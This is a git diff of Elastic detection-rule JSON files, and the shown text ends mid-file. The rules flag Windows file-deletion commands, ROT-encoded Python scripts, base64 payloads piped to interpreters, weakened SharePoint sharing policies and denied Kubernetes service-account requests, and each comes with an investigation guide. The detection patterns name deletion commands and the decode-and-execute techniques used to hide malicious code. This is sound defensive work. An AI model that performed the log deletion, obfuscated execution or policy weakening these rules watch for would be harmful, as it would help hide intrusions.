"building_block_type": "default", + "description": "This rule identifies the execution of commands that can be used to delete files and directories. Adversaries may delete files and directories on a host system, such as logs, browser history, or malware.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.process-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "File or Directory Deletion Command", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and \n(\n ((process.name : \"rundll32.exe\" or ?process.pe.original_file_name : \"RUNDLL32.EXE\") and process.args : \"*InetCpl.cpl,Clear*\") or \n ((process.name : \"reg.exe\" or ?process.pe.original_file_name : \"reg.exe\") and process.args : \"delete\") or \n (\n (process.name : \"cmd.exe\" or ?process.pe.original_file_name : \"Cmd.Exe\") and\n process.args : (\"*rmdir*\", \"*rm *\", \"rm\", \"*del *\", \"del\", \"*erase *\", \"erase\") and\n not process.args : (\n \"*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\",\n \"*\\\\AppData\\\\Local\\\\Temp\\\\DockerDesktop\\\\*\",\n \"*\\\\AppData\\\\Local\\\\Temp\\\\Report.*\",\n \"*\\\\AppData\\\\Local\\\\Temp\\\\*.PackageExtraction\"\n )\n ) or\n ((process.name : \"powershell.exe\" or ?process.pe.original_file_name : \"PowerShell.EXE\") and\n process.args : (\"*rmdir\", \"rm\", \"rd\", \"*Remove-Item*\", \"del\", \"*]::Delete(*\"))\n) and not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5919988c-29e1-4908-83aa-1f087a838f63", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Rule Type: BBR", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.004", + "name": "File Deletion", + "reference": "https://attack.mitre.org/techniques/T1070/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "5919988c-29e1-4908-83aa-1f087a838f63_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5ab49127-b1b3-46e6-8a38-9e8512a2a363_5.json b/packages/security_detection_engine/kibana/security_rule/5ab49127-b1b3-46e6-8a38-9e8512a2a363_5.json new file mode 100644 index 00000000000..cd07760c141 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5ab49127-b1b3-46e6-8a38-9e8512a2a363_5.json @@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a Python script that uses the ROT cipher for letters substitution. Adversaries may use this method to encode and obfuscate part of their malicious code in legit python packages.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ROT Encoded Python Script Execution", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating ROT Encoded Python Script Execution\n\nROT encoding, a simple letter substitution cipher, is often used to obfuscate Python scripts, making them harder to analyze. Adversaries exploit this by embedding ROT-encoded scripts within legitimate packages to evade detection. The detection rule identifies such activities by monitoring Python script executions and the presence of ROT-encoded compiled files, flagging potential misuse on Windows and macOS systems.\n\n### Possible investigation steps\n\n- Review the process entity ID to identify the specific Python process that triggered the alert and gather details such as the process start time and command line arguments.\n- Examine the file path and name of the ROT-encoded compiled file (e.g., \"rot_??.cpython-*.pyc\") to determine its origin and whether it is part of a legitimate package or potentially malicious.\n- Check the parent process of the Python script to understand how it was initiated and whether it was executed by a legitimate application or user.\n- Investigate the user account associated with the process to determine if the activity aligns with their typical behavior or if it appears suspicious.\n- Analyze any network connections or file modifications made by the Python process to identify potential data exfiltration or further malicious activity.\n- Correlate this alert with other security events or logs from the same host to identify patterns or additional indicators of compromise.\n\n### False positive analysis\n\n- Legitimate development activities may trigger the rule if developers use ROT encoding for testing or educational purposes. To manage this, create exceptions for known development environments or specific user accounts involved in such activities.\n- Automated scripts or tools that use ROT encoding for legitimate data processing tasks can be flagged. Identify these scripts and whitelist their execution paths or associated process names to prevent false alerts.\n- Some security tools or software may use ROT encoding as part of their normal operations. Review and document these tools, then configure the detection system to exclude their known file paths or process identifiers.\n- Regularly scheduled tasks or cron jobs that involve ROT-encoded files for non-malicious purposes can cause false positives. Exclude these tasks by specifying their unique identifiers or execution schedules in the detection rule settings.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further spread of potentially malicious activity.\n- Terminate any running Python processes that are identified as executing ROT-encoded scripts to halt the execution of obfuscated code.\n- Conduct a thorough review of the affected system to identify and remove any ROT-encoded Python files, specifically targeting files matching the pattern \"rot_??.cpython-*.pyc*\".\n- Restore any affected systems from a known good backup to ensure the removal of any persistent threats.\n- Implement application whitelisting to prevent unauthorized Python scripts from executing, focusing on blocking scripts with ROT encoding patterns.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems are affected.\n- Update detection mechanisms to monitor for similar ROT-encoded script activities, enhancing the ability to detect and respond to future threats.", + "query": "sequence by process.entity_id with maxspan=1m\n [process where host.os.type in (\"windows\", \"macos\") and event.type == \"start\" and process.name : \"python*\" and\n not (\n process.args : (\"*gcloud.py\", \"*conda-script.py\", \"*compileall.py\", \"*.lmstudio*\") or\n process.parent.args : (\"*gcloud.py\", \"*conda-script.py\", \"*compileall.py\", \"*.lmstudio*\")\n )]\n [file where host.os.type in (\"windows\", \"macos\") and\n event.action != \"deletion\" and process.name : \"python*\" and file.name : \"rot_??.cpython-*.pyc*\"]\n", + "references": [ + "https://www.elastic.co/security-labs/dprk-code-of-conduct", + "https://www.reversinglabs.com/blog/fake-recruiter-coding-tests-target-devs-with-malicious-python-packages" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5ab49127-b1b3-46e6-8a38-9e8512a2a363", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + }, + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/", + "subtechnique": [ + { + "id": "T1027.013", + "name": "Encrypted/Encoded File", + "reference": "https://attack.mitre.org/techniques/T1027/013/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "5ab49127-b1b3-46e6-8a38-9e8512a2a363_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5bdad1d5-5001-4a13-ae99-fa8619500f1a_3.json b/packages/security_detection_engine/kibana/security_rule/5bdad1d5-5001-4a13-ae99-fa8619500f1a_3.json deleted file mode 100644 index 2d4bee65655..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/5bdad1d5-5001-4a13-ae99-fa8619500f1a_3.json +++ /dev/null @@ -1,139 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects when a base64 decoded payload is piped to an interpreter on Linux systems. Adversaries may use base64 encoding to obfuscate data and pipe it to an interpreter to execute malicious code. This technique may be used to evade detection by host- or network-based security controls.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.process*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Base64 Decoded Payload Piped to Interpreter", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Base64 Decoded Payload Piped to Interpreter\n\nBase64 encoding is a method to encode binary data into ASCII text, often used for data obfuscation. Adversaries exploit this by encoding malicious payloads and decoding them on a target system, piping the output to interpreters like bash or python for execution. The detection rule identifies such activities by monitoring for processes that decode Base64 and subsequently execute scripts, indicating potential malicious behavior.\n\n### Possible investigation steps\n\n- Review the process command line arguments to identify the specific Base64 decoding activity, focusing on the presence of flags like `-d` or `-a` in conjunction with tools such as `base64`, `openssl`, or scripting languages like `python`, `perl`, or `ruby`.\n- Examine the parent process entity ID and command line to understand the context in which the Base64 decoding was initiated, identifying any potentially suspicious parent processes.\n- Investigate the subsequent interpreter process that was executed, such as `bash`, `python`, or `ruby`, to determine the nature of the script or command being run, looking for any signs of malicious activity.\n- Check the timing and sequence of the processes involved to confirm if the Base64 decoding and interpreter execution occurred within the specified maxspan of 3 seconds, indicating a likely automated or scripted action.\n- Analyze the host ID and any associated user accounts to determine if the activity aligns with expected behavior for that system or user, or if it suggests unauthorized access or compromise.\n- Correlate the alert with other security events or logs from the same host or user to identify any additional indicators of compromise or related suspicious activities.\n\n### False positive analysis\n\n- Legitimate administrative scripts may use Base64 encoding to handle data securely. Review the context of the script execution and consider excluding specific scripts or directories from monitoring if they are verified as safe.\n- Automated backup or data transfer processes might use Base64 encoding for data integrity. Identify these processes and create exceptions for known, trusted applications or scripts.\n- Development environments often use Base64 encoding for testing purposes. If a development tool or script is frequently triggering alerts, consider excluding the specific development environment or user accounts from this rule.\n- Security tools or monitoring solutions may use Base64 encoding as part of their normal operations. Verify the source of the alert and exclude known security tools from triggering this rule.\n- System updates or package installations might involve Base64 operations. Monitor the timing and context of these alerts and exclude specific update processes if they are consistently identified as false positives.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further execution of potentially malicious code and lateral movement.\n- Terminate any suspicious processes identified by the detection rule, particularly those involving base64 decoding and piping to interpreters.\n- Conduct a forensic analysis of the affected system to identify any additional indicators of compromise, such as unauthorized file modifications or network connections.\n- Restore the system from a known good backup if malicious activity is confirmed and the integrity of the system is compromised.\n- Update and patch all software and systems to mitigate vulnerabilities that could be exploited by similar techniques.\n- Implement enhanced monitoring and logging for base64 decoding activities and interpreter executions to detect similar threats in the future.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if broader organizational impacts exist.\n", - "query": "sequence by host.id, process.parent.entity_id with maxspan=3s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name in (\"base64\", \"base64plain\", \"base64url\", \"base64mime\", \"base64pem\", \"base32\", \"base16\") and process.command_line like~ \"*-*d*\") or\n (process.name == \"openssl\" and process.args == \"enc\" and process.args in (\"-d\", \"-base64\", \"-a\")) or\n (process.name like \"python*\" and\n (process.args == \"base64\" and process.args in (\"-d\", \"-u\", \"-t\")) or\n (process.args == \"-c\" and process.args like \"*base64*\" and process.command_line like~ \"*b64decode*\")\n ) or\n (process.name like \"perl*\" and process.command_line like~ \"*decode_base64*\") or\n (process.name like \"ruby*\" and process.args == \"-e\" and process.command_line like~ \"*Base64.decode64*\")\n )]\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name like~ (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"perl*\", \"ruby*\", \"lua*\", \"php*\"\n )]\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.command_line", - "type": "wildcard" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.entity_id", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "5bdad1d5-5001-4a13-ae99-fa8619500f1a", - "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.004", - "name": "Unix Shell", - "reference": "https://attack.mitre.org/techniques/T1059/004/" - } - ] - }, - { - "id": "T1204", - "name": "User Execution", - "reference": "https://attack.mitre.org/techniques/T1204/", - "subtechnique": [ - { - "id": "T1204.002", - "name": "Malicious File", - "reference": "https://attack.mitre.org/techniques/T1204/002/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 3 - }, - "id": "5bdad1d5-5001-4a13-ae99-fa8619500f1a_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/632906c6-ba8f-44c0-8386-ec0bbc8518bf_1.json b/packages/security_detection_engine/kibana/security_rule/632906c6-ba8f-44c0-8386-ec0bbc8518bf_1.json new file mode 100644 index 00000000000..b8056f7a1e7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/632906c6-ba8f-44c0-8386-ec0bbc8518bf_1.json @@ -0,0 +1,158 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies when a SharePoint or OneDrive site sharing policy is changed to weaken security controls. The SharingPolicyChanged event fires for many routine policy modifications, but this rule targets specific high-risk transitions where sharing restrictions are relaxed. This includes enabling guest sharing, enabling anonymous link sharing, making a site public, or enabling guest user access. Adversaries who compromise administrative accounts may weaken sharing policies to exfiltrate data to external accounts or create persistent external access paths.", + "false_positives": [ + "Administrators legitimately enabling external sharing for a new collaboration site or project.", + "Organizational policy changes that intentionally broaden sharing capabilities across sites.", + "Migration or onboarding projects that temporarily require external sharing to be enabled." + ], + "from": "now-9m", + "index": [ + "filebeat-*", + "logs-o365.audit-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "M365 SharePoint Site Sharing Policy Weakened", + "note": "## Triage and Analysis\n\n### Investigating M365 SharePoint Site Sharing Policy Weakened\n\nThis rule detects when SharePoint or OneDrive sharing policies are modified to weaken security controls. The `SharingPolicyChanged` event captures modifications to site-level sharing settings stored in `ModifiedProperties`, where the setting name is a dynamic field key and `OldValue`/`NewValue` track the transition. This rule targets specific transitions that represent a security posture degradation. Note that Microsoft uses inconsistent keyword value formats across settings, some use `True`/`False` while others use `Enabled`/`Disabled`.\n\n#### Possible Investigation Steps\n\n- Identify the user who performed the change via `user.id` and determine if they have a legitimate administrative role.\n- Check if the acting user is a service principal (e.g., `ServiceOperator`, `app@sharepoint`) or a human account. Service principal changes may indicate automated processes or compromised application credentials.\n- Review which specific setting was changed by examining the `o365.audit.ModifiedProperties.*` fields:\n - ShareWithGuests: Guest/external sharing was enabled on the site. External users can now be invited to access content.\n - ShareUsingAnonymousLinks: Anonymous \"Anyone\" link sharing was enabled. Content can now be shared via unauthenticated links.\n - IsPublic: The site or group was changed from private to public visibility.\n - AllowGuestUser: Guest user access was enabled for the site.\n - AllowFederatedUsers: Federated (external organization) user access was enabled.\n - AllowTeamsConsumer: Teams personal account (consumer) user access was enabled.\n- Identify the affected site via `o365.audit.ObjectId` (the site URL) and assess the sensitivity of its content.\n- Review Azure AD / Entra ID sign-in logs for the acting account to check for authentication anomalies (unusual location, device code flow, new device).\n- Look for subsequent sharing activity on the same site \u2014 `SharingSet`, `AnonymousLinkCreated`, `SharingInvitationCreated`, or file download events shortly after the policy change.\n- Determine if the change was part of a planned change request or occurred outside of normal change windows.\n\n### False Positive Analysis\n\n- IT administrators enabling external sharing for legitimate collaboration needs. Correlate with change management tickets or Slack/Teams messages.\n- Automated provisioning scripts that configure sharing settings during site creation. These typically use service principal accounts with predictable patterns.\n- Microsoft service operations (`ServiceOperator`) may modify settings as part of tenant-level policy propagation.\n\n### Response and Remediation\n\n- If the change is unauthorized, immediately revert the sharing policy to its previous restrictive state.\n- Revoke sessions and reset credentials for the compromised account.\n- Review what content was accessed or shared after the policy change using `FileAccessed`, `FileDownloaded`, and sharing audit events.\n- Audit all sites for similar unauthorized sharing policy changes.\n- Implement Conditional Access policies to restrict administrative actions to trusted networks and compliant devices.\n- Enable Privileged Identity Management (PIM) for SharePoint administrator roles to enforce just-in-time access.\n", + "query": "event.dataset: \"o365.audit\" and event.provider: (\"SharePoint\" or \"OneDrive\") and\n event.action: \"SharingPolicyChanged\" and event.outcome: \"success\" and\n (\n (o365.audit.ModifiedProperties.ShareWithGuests.NewValue: (true or \"Enabled\") and\n o365.audit.ModifiedProperties.ShareWithGuests.OldValue: (false or \"Disabled\"))\n or\n (o365.audit.ModifiedProperties.ShareUsingAnonymousLinks.NewValue: (true or \"Enabled\") and\n o365.audit.ModifiedProperties.ShareUsingAnonymousLinks.OldValue: (false or \"Disabled\"))\n or\n (o365.audit.ModifiedProperties.IsPublic.NewValue: (true or \"Enabled\") and\n o365.audit.ModifiedProperties.IsPublic.OldValue: (false or \"Disabled\"))\n or\n (o365.audit.ModifiedProperties.AllowGuestUser.NewValue: (true or \"Enabled\") and\n o365.audit.ModifiedProperties.AllowGuestUser.OldValue: (false or \"Disabled\"))\n or\n (o365.audit.ModifiedProperties.AllowFederatedUsers.NewValue: (true or \"Enabled\") and\n o365.audit.ModifiedProperties.AllowFederatedUsers.OldValue: (false or \"Disabled\"))\n or\n (o365.audit.ModifiedProperties.AllowTeamsConsumer.NewValue: (true or \"Enabled\") and\n o365.audit.ModifiedProperties.AllowTeamsConsumer.OldValue: (false or \"Disabled\"))\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/purview/audit-log-activities#site-administration-activities", + "https://learn.microsoft.com/en-us/purview/audit-log-sharing", + "https://learn.microsoft.com/en-us/sharepoint/turn-external-sharing-on-or-off" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.AllowFederatedUsers.NewValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.AllowFederatedUsers.OldValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.AllowGuestUser.NewValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.AllowGuestUser.OldValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.AllowTeamsConsumer.NewValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.AllowTeamsConsumer.OldValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.IsPublic.NewValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.IsPublic.OldValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.ShareUsingAnonymousLinks.NewValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.ShareUsingAnonymousLinks.OldValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.ShareWithGuests.NewValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.ShareWithGuests.OldValue", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "632906c6-ba8f-44c0-8386-ec0bbc8518bf", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "632906c6-ba8f-44c0-8386-ec0bbc8518bf_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_8.json b/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_8.json deleted file mode 100644 index 3d36a19e602..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_8.json +++ /dev/null @@ -1,77 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects when a service account makes an unauthorized request for resources from the API server. Service accounts follow a very predictable pattern of behavior. A service account should never send an unauthorized request to the API server. This behavior is likely an indicator of compromise or of a problem within the cluster. An adversary may have gained access to credentials/tokens and this could be an attempt to access or create resources to facilitate further movement or execution within the cluster.", - "false_positives": [ - "Unauthorized requests from service accounts are highly abnormal and more indicative of human behavior or a serious problem within the cluster. This behavior should be investigated further." - ], - "index": [ - "logs-kubernetes.*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Kubernetes Denied Service Account Request", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Kubernetes Denied Service Account Request\n\nKubernetes service accounts are integral for managing pod permissions and accessing the API server. They typically follow strict access patterns. Adversaries may exploit compromised service account credentials to probe or manipulate cluster resources, potentially leading to unauthorized access or lateral movement. The detection rule identifies anomalies by flagging unauthorized API requests from service accounts, signaling possible security breaches or misconfigurations.\n\n### Possible investigation steps\n\n- Review the specific service account involved in the unauthorized request by examining the kubernetes.audit.user.username field to determine which service account was used.\n- Analyze the kubernetes.audit.annotations.authorization_k8s_io/decision field to confirm the request was indeed forbidden and identify the nature of the denied request.\n- Investigate the source of the request by checking the originating pod or node to understand where the unauthorized request was initiated.\n- Examine recent activity logs for the service account to identify any unusual patterns or deviations from its typical behavior.\n- Check for any recent changes or deployments in the cluster that might have affected service account permissions or configurations.\n- Assess whether there have been any recent security incidents or alerts related to the cluster that could be connected to this unauthorized request.\n\n### False positive analysis\n\n- Service accounts used for testing or development may generate unauthorized requests if they are not properly configured. Regularly review and update permissions for these accounts to ensure they align with their intended use.\n- Automated scripts or tools that interact with the Kubernetes API might trigger false positives if they use service accounts with insufficient permissions. Ensure these tools have the necessary permissions or adjust the detection rule to exclude known benign activities.\n- Misconfigured role-based access control (RBAC) settings can lead to legitimate service accounts being denied access. Conduct periodic audits of RBAC policies to verify that service accounts have appropriate permissions.\n- Temporary service accounts created for specific tasks might not have the correct permissions, leading to denied requests. Consider excluding these accounts from the rule if they are known to perform non-threatening activities.\n- Service accounts from third-party integrations or plugins may not have the required permissions, resulting in false positives. Validate the permissions needed for these integrations and adjust the rule to exclude their expected behavior.\n\n### Response and remediation\n\n- Immediately isolate the affected service account by revoking its access tokens and credentials to prevent further unauthorized API requests.\n- Conduct a thorough review of the audit logs to identify any other suspicious activities or unauthorized access attempts associated with the compromised service account.\n- Rotate credentials for the affected service account and any other potentially impacted accounts to mitigate the risk of further exploitation.\n- Assess and remediate any misconfigurations in role-based access control (RBAC) policies that may have allowed the unauthorized request, ensuring that service accounts have the minimum necessary permissions.\n- Escalate the incident to the security operations team for further investigation and to determine if additional containment measures are required.\n- Implement enhanced monitoring and alerting for similar unauthorized access attempts to improve detection and response times for future incidents.\n- Review and update incident response plans to incorporate lessons learned from this event, ensuring readiness for similar threats in the future.", - "query": "event.dataset: \"kubernetes.audit_logs\"\n and kubernetes.audit.user.username: system\\:serviceaccount\\:*\n and kubernetes.audit.annotations.authorization_k8s_io/decision: \"forbid\"\n", - "references": [ - "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections", - "https://kubernetes.io/docs/reference/access-authn-authz/authentication/#service-account-tokens" - ], - "related_integrations": [ - { - "package": "kubernetes", - "version": "^1.4.1" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.user.username", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "63c056a0-339a-11ed-a261-0242ac120002", - "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Data Source: Kubernetes", - "Tactic: Discovery", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1613", - "name": "Container and Resource Discovery", - "reference": "https://attack.mitre.org/techniques/T1613/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 8 - }, - "id": "63c056a0-339a-11ed-a261-0242ac120002_8", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_9.json b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_9.json deleted file mode 100644 index 597d171b777..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_9.json +++ /dev/null @@ -1,90 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects when an unauthenticated user request is authorized within the cluster. Attackers may attempt to use anonymous accounts to gain initial access to the cluster or to avoid attribution of their activities within the cluster. This rule excludes the /healthz, /livez and /readyz endpoints which are commonly accessed anonymously.", - "false_positives": [ - "Anonymous access to the 